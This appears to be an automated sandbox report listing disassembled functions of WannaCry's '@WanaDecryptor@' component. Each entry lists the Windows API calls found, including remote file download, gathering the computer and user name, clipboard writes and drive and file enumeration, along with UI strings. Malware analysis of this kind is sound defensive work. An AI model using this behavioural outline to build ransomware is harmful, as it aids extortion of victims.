    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404090, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55
    APIs
    • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
    • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
    • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
    • #860.MFC42(00421798), ref: 004040F6
    • #858.MFC42(00000000,00421798), ref: 004040FE
    • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
    • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00407CB0, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
    APIs
      • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
      • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
      • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
    • #2514.MFC42 ref: 00407CE5
    • #2414.MFC42 ref: 00407D1A
    • #2414.MFC42 ref: 00407D4F
    • #616.MFC42 ref: 00407D6E
    • #693.MFC42 ref: 00407D7F
    • #641.MFC42 ref: 00407D93
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004085C0, Relevance: 13.6, APIs: 9, Instructions: 75
    APIs
    • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
    • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
    • GetSysColor.USER32 ref: 0040861D
    • GetSysColor.USER32(00000009), ref: 00408624
    • GetSysColor.USER32(00000012), ref: 0040862B
    • GetSysColor.USER32(00000002), ref: 00408632
    • SystemParametersInfoA.USER32(00001008,00000000,00000000,00000000), ref: 0040864A
    • GetSysColor.USER32(0000001B), ref: 0040865C
    • #6140.MFC42(00000002,000000FF), ref: 00408667
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040C060, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138
    APIs
      • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BED0: GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
      • Part of subcall function 0040BED0: GetUserNameA.ADVAPI32 ref: 0040BFF5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
    • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
    • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
    • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
    • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00401A90, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68
    APIs
    • CreateProcessA.KERNEL32 ref: 00401AE3
    • WaitForSingleObject.KERNEL32(?,?), ref: 00401AFB
    • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
    • CloseHandle.KERNEL32(?), ref: 00401B31
    • CloseHandle.KERNEL32(?), ref: 00401B38
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00401140, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
    APIs
    • #4710.MFC42 ref: 00401145
    • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
    • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
    • #537.MFC42(Connecting to server...), ref: 0040118D
      • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
      • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
      • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
    • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
    • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
    Strings
    • Connecting to server..., xrefs: 00401188
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040B3C0, Relevance: 12.2, APIs: 8, Instructions: 203
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
      • Part of subcall function 0040ADC0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040ADD9
      • Part of subcall function 0040ADC0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040ADE9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
      • Part of subcall function 0040B0C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B0D9
      • Part of subcall function 0040B0C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B0E9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00407C30, Relevance: 12.0, APIs: 8, Instructions: 48
    APIs
    • OpenClipboard.USER32(?), ref: 00407C38
    • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
    • CloseClipboard.USER32 ref: 00407C5B
    • EmptyClipboard.USER32 ref: 00407C66
    • GlobalLock.KERNEL32(00000000), ref: 00407C79
    • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
    • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
    • CloseClipboard.USER32 ref: 00407CA1
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00402F10, Relevance: 10.6, APIs: 7, Instructions: 139
    APIs
    • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00407F80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
    APIs
    • fopen.MSVCRT ref: 00407FBD
    • fread.MSVCRT ref: 00407FDD
    • fclose.MSVCRT ref: 00407FE4
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
      • Part of subcall function 00401A10: fopen.MSVCRT ref: 00401A2B
      • Part of subcall function 00401A10: fread.MSVCRT ref: 00401A4B
      • Part of subcall function 00401A10: fwrite.MSVCRT ref: 00401A58
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A66
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A74
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00401220, Relevance: 10.6, APIs: 7, Instructions: 53
    APIs
    • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
    • KillTimer.USER32(?,000003E9), ref: 0040125E
    • #4853.MFC42 ref: 00401266
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
    • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
    • #2379.MFC42 ref: 004012C4
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00403860, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
    APIs
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
    • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
    • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
    Strings
    • Please select a host to decrypt., xrefs: 00403885
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004044C0, Relevance: 10.5, APIs: 7, Instructions: 38
    APIs
    • GetParent.USER32(?), ref: 004044D2
    • #2864.MFC42(00000000), ref: 004044D9
    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
    • #2860.MFC42(00000000), ref: 004044EF
    • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
    • CreateFontIndirectA.GDI32(?), ref: 00404513
    • #1641.MFC42(00000000), ref: 0040451D
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040A150, Relevance: 9.4, APIs: 6, Instructions: 375
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00409C20, Relevance: 9.1, APIs: 6, Instructions: 104
    APIs
    • #3797.MFC42 ref: 00409C27
    • #6734.MFC42(?,?), ref: 00409C4E
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
    • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
    • #4284.MFC42(00000000,00004000,00000000,?,?), ref: 00409CDD
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00409CF0
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004127E0, Relevance: 9.1, APIs: 6, Instructions: 103
    APIs
    • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
    • #823.MFC42(?,?,?), ref: 00412849
      • Part of subcall function 00411C00: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,00000000,?,?,00000000,0041289D), ref: 00411C27
      • Part of subcall function 00411C00: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00411C87
    • #825.MFC42(?), ref: 004128B5
    • #825.MFC42(?), ref: 004128CE
    • #825.MFC42(00000000), ref: 004128DD
    • #823.MFC42(00000008), ref: 004128FA
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040B780, Relevance: 9.1, APIs: 6, Instructions: 68
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000428), ref: 0040B793
    • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
    • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
    • DeleteFileA.KERNEL32(?), ref: 0040B815
    • DeleteFileA.KERNEL32(?), ref: 0040B82C
      • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000000,00000428), ref: 0040B6B4
      • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
      • Part of subcall function 0040B6A0: sprintf.MSVCRT ref: 0040B74E
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00409A40, Relevance: 9.1, APIs: 6, Instructions: 65
    APIs
    • OffsetRect.USER32(?,?,?), ref: 00409A9B
    • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
    • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
    • #5781.MFC42(0041679C,00000000), ref: 00409ACC
    • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
    • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004034A0, Relevance: 9.1, APIs: 6, Instructions: 56
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404EB0, Relevance: 9.1, APIs: 6, Instructions: 56
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00406940, Relevance: 9.1, APIs: 6, Instructions: 56
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404310, Relevance: 9.1, APIs: 6, Instructions: 51
    APIs
    • #470.MFC42(?,00000000), ref: 0040433F
    • #5789.MFC42 ref: 00404354
    • #5875.MFC42(00000001), ref: 00404361
    • #6172.MFC42(?,00000001), ref: 0040436E
    • #5789.MFC42(00000000), ref: 0040438F
    • #755.MFC42(00000000), ref: 004043A0
      • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
      • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
      • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
      • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
      • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
      • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
      • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00403EB0, Relevance: 9.0, APIs: 6, Instructions: 24
    APIs
    • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
    • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
    • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
    • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
    • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
    • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00403A20, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63
    APIs
    • GetLogicalDrives.KERNEL32 ref: 00403A35
    • GetDriveTypeW.KERNEL32 ref: 00403A7A
    • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
      • Part of subcall function 004026B0: swprintf.MSVCRT ref: 00402728
      • Part of subcall function 004026B0: FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
      • Part of subcall function 004026B0: #825.MFC42(?,?,?,?), ref: 0040276F
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 004027A5
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004027E1
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004027FB
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
      • Part of subcall function 004026B0: GetFileAttributesW.KERNEL32(?), ref: 00402830
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
      • Part of subcall function 004026B0: wcslen.MSVCRT ref: 0040286E
      • Part of subcall function 004026B0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028C3
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028DD
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028F3
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00402909
      • Part of subcall function 004026B0: wcslen.MSVCRT ref: 00402914
